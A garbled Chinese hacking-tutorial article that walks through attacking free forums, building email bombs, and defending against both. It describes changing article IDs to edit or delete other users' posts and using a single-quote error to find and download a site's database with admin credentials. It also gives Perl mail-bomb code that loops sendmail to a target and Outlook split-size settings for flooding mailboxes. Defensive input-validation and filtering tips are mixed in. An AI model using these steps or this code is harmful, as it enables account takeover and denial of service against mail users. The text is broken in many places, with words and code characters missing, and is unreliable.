攻击思路方法是为后面专门介绍相关内容做铺垫
读者在学习时候应该多了解
些有关Perl和网站WebSite知识如果可能最好在自己系统中安装套网站WebSite服务
然后寻找些免费Perl代码进行调试、研究
、攻击免费论坛:这里介绍
攻击非常简单它所达到效果就是获得论坛管理员密码、具有修改论坛权限等所以并不设计漏洞扫描和清除痕迹等步骤首先介绍下问题起源:在网络上很多网站WebSite都提供了论坛或者电子留言版这些服务大多数使用asp、php、cgi或者perl编写完成而对于这些免费论坛代码黑客也能够获得因此只要经过分析就可以找到“免费软件Software中缺陷”进而对网站WebSite上提供论坛进行攻击例如http://www.ls1238.com/网站WebSite提供
“稿件管理系统”就存在个很严重问题(本人已经和他们联系并介绍说明此漏洞、相关漏洞现已修复)让我们看看通过浏览器访问它形式当我们阅读其中稿件时会发现在URL内地址是/list.asp?articleid=nnnn显然list.asp是显示文章而后面?articleid=nnnn则是它参数nnnn是文章编号当黑客申请成为tougao网站WebSite员后便拥有了上传文章和修改、删除自己发表文章权利修改文章使用editarticleself.asp?articleid=nnnn其中nnnn应该是自己文章代码但是如果黑客将文章代码改变会如何样呢?修改了文章代码后发现
可以对其他文章进行修改!也就是说任何经过免费注册成为tougao网站WebSite用户都可以拥有修改任意文章权利同时使用delarticleself.asp则可以删除任何文章!次攻击过程我已经叙述完了是不是非常简单?其实像这种问题网络上随处可见好好想下如果对nnnn修改进行更“不着边际”例如输入几个英文字母或者标点符号会出现什么情况?经过尝试发现当属数值为“单引号”是系统会出现
并报告数据库文件名称、磁盘物理路径等敏感信息这样就可以直接通过下载软件Software将他们数据库下载到本地并从中找到管理员账号在早期
YukiBBS3000上当注册者注册信息内包含单引号时也会出现“运行”提示并且造成论坛内部数据彻底终止论坛正常运行2、防范攻击:
相对来说
网易、新浪等大型门户网站WebSite在这方面做比较好他们对文章ID号进行了判断防止特殊
介入如果使用者输入了非法经过检测系统会提示输入ID号码非法并且拒绝接受请求返回个“输入非法”界面另外对于文章
修改他们也考虑非常周到在进行每次文章修改时候系统都会检测用户身份确定准备修改文章是否属于登陆身份如果不属于则会提出警告信息而实际上这种问题在早期他们网站WebSite上也是存在只不过因管理员网络安全意识比较强因此即使发现并修补了漏洞cgi、perl等
在设计时候必须考虑到各种可能出现情况例如对文件名提交必须考虑周到个没有考虑到特殊名称也许会对系统造成非常严重后果用户输入个文件名,有可能就试图打开输入危险串!例如用户输入文件名中包含路径如目录斜杠和双点!尽管你期望是输入公用文件名(例如report.txt)但结果却可能是/report.txt或../../report.txt等等系统中所有文件就有可能泄露出去后果是可想而知设计cgi、perl
最好能够在代码中加入下面非常检测代码:
(($file_name=~/[^a-zA-Z_\.]/)||($file_name=~/^\./)){ #文件包含有不合法
}另外还要注意对大于号、小于号
判断
这两种符号是html文档中属性符号不进行屏蔽会对论坛造成严重后果网络上不是有很多“小儿科”聊天室踢人术吗?简单方式是不允许小于号和大于号出现所有HTML语法必须包含在这两个间如果检测到它们就返回个提示下面行Perl代码快速地清除了这两个:$user_input=~s/<>//g;
当然还有比较好
选择就是将这两个转换成它们HTML换码(特殊代码),用于表示每个而不使用该本身下面代码通过全部用<替换了小于符号用>替换了大于符号从而完成了转换过程: $user_input=~s/</& lt;/g;
$user_input=~s/>/& gt;/g;
3、编写简单
邮件炸弹:利用Perl
可以非常快速编写邮件炸弹这种思路方法比起直接使用别人编写邮件炸弹要好多至少学习者能够真正“体会下”什么才是黑客有关这个炸弹编译环境是具备台有CGI权限网络服务器同时这台服务器上提供了sendmail命令(当然这切可以在自己系统上进行设置)并且学习着还要初步了解有关perl语言知识原理非常简单就是利用sendmail命令向目标重复发送相同内容电子邮件为了控制发送邮件数量我们声明个计数器变量同时将用while
做循环下面我们看下源代码:#!/bin/perl
$file='/user/lib/sendmail';
$target='[email protected]';
$count=0;
while($count<1000){
open(MAIL,"/$file$target") || die" Can not open $file!\n
pr
MAIL"哈哈你被攻击啦"close(MAIL);
sleep 3;
$count
;}
看明白了吗?
就上面这点儿是不是非常简单?Perl属于解释型语言因而不需要进行编译直接将源代码上传到服务器上然后设置成为755或者775型就可以通过浏览器
而直接使用了中$file和$target变量分别定义了sendmail命令路径和目标地址在使用此以前要根据个人需要进行修改而$count变量是我们要发送炸弹邮件数量发送邮件工作是服务器完成因而速度非常快这个数量可以设置大些我们并不会感觉到缓慢4、使用Outlook制作电子邮件炸弹:
相对上
种思路方法这个思路方法更加直接它不需要专用工具而只需要利用Outlook电子邮件客户端软件Software就可以轻松完成首先介绍下邮件炸弹基本原理:电子邮件炸弹般来说分成两种种是通过发送巨大垃圾邮件使对方电子邮件服务器空间溢出从而造成无法接受电子邮件;另种思路方法是无休止发送相同内容但很小邮件使对方接收不过来而放弃自己电子邮箱因此我们只要实现其中种即可称的为“邮件炸弹”使用Outlook制作电子邮件炸弹就是利用了上面说
第 2种思路方法不断向指定目标发送电子邮件首先我们要做些准备工作:申请个免费电子信箱并把这个信箱账号设置到Outlook中然后选择Outlook工具菜单“工具”-〉“账号”选择其中刚刚申请那个电子邮件账号然后点击窗口右面“属性”按钮在出现属性窗口中继续点击窗口上面“高级”标签更改“发送”设置中“邮件拆分大小”属性值这个值尽量更改小些(推荐更改成16)确认退出这样以后只要使用这个经过设置
电子信箱发电子邮件只要邮件大小超过了规定字节数Outlook就会自动将电子邮件进行分割例如封1600KB信件将它拆分成16KB封电子邮件发送给对方对方信箱中就会出现100多封电子邮件邮件炸弹功能就实现了!5、如何防止电子邮件炸弹:
电子邮件
防范可以从多个方面着手例如未雨绸缪、从开始就谨慎使用电子信箱或者也可以亡羊补牢、尽快修复电子信箱在网络上大多数有关防范邮件炸弹文章都说是Linux等系统而真正涉及初级用户并不是很多然是实际更多人使用还是Windows系统即便pop3服务器是Linux系统现在也没有更多人通过传统命令方式接收邮件了这里将讲述个和读者联系紧密防止电子邮件炸弹思路方法1、不公开信箱地址、准备多个信箱:
早作准备
不让黑客知道自己电子信箱地址是最好思路方法这就需要使用者在网络上尽量少公开自己信箱地址不要轻易将地址留给不认识人或者留在电子论坛上当然如果可以使用者可以多申请几个电子信箱区别信箱联络区别人专门预备出个公开电子信箱旦受到攻击也不会造成过多损失2、使用软件Software快速清理炸弹邮件:
使用BombCleaner等炸弹清理软件Software
可以在不接受信件时候察看邮件清单从中选择垃圾信件进行远程删除这样做可以节省大量下载信件时间同时也堵住了通过电子邮件传播病毒但是这种思路方法有它最明显缺陷:旦信箱已经被邮件塞满了就来不及删除上面信件、而且信发送过来重要信件也无法接收了3、设置信箱过滤:
信箱过滤可以很好
解决上面软件Software解决不了问题过滤器可以设置在本地电子邮件客户端上也可以直接通过浏览器在pop3信箱内部进行设置前者和上面介绍利用软件Software基本类似也是在接收电子邮件时候对邮件是否属于垃圾或炸弹进行判断所以在信箱被塞满时候也不见起到什么效果但是如果能够在pop3服务器上设置自己信箱
过滤就可以从根本上避免被攻击可能了具体做法是这样通过浏览器登陆到pop3服务器上然后进入自己信箱的后找到“邮件收发设置”并且在其中过滤器内填写有关发送垃圾邮件邮件地址(多个地址可以用分号隔开)并且确认保存这样就能够在服务器上过滤掉炸弹邮件、保障自己电子信箱安全了4、设置接收邮件
大小:如果黑客发送过来
不是成百上千封“小信件”而是封上百兆炸弹如何办呢?这种邮件不需要多少封过来就可以把电子信箱塞满满所以用户在设置“过滤”时候还要注意“接收信件大小”选项最好将这个数值控制在电子信箱 3分的左右例如使用者电子信箱空间是 3十兆那么可以通过设置规定接收信件大小不得超过十兆每封如果超过了这个数值那么来信将被确认为邮件炸弹而直接被系统舍弃这样邮件炸弹便再无施展自己空间了篇文章: 3389和Windows漏洞利用篇文章: 根据PID查杀木马病毒适用小思路方法
最新评论